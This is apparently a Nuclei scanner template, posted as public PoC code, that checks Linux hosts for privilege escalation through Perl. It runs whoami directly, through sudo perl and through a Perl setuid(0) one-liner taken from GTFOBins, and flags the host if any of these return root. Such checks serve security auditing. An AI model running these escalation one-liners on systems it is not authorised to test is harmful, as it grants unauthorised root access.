Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.
PoC代码[已公开]
id: privesc-perl
info:
name: Perl - Privilege Escalation
author: daffainfo
severity: high
description: |
Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.
reference:
- https://gtfobins.github.io/gtfobins/perl/
metadata:
verified: true
max-request: 4
tags: code,linux,perl,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
perl -e 'exec "whoami";'
- engine:
- sh
- bash
source: |
sudo perl -e 'exec "whoami";'
- engine:
- sh
- bash
source: |
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4a0a00473045022024a9a58b297aaab3fe3fa859fc3460822975c172e8ef3c94ed73254ccf5cc2c202210081d1198ace6df419451923f3307228fac89dafb9c29d251234597a53ed4d4202:922c64590222798bb761d5b6d8e72950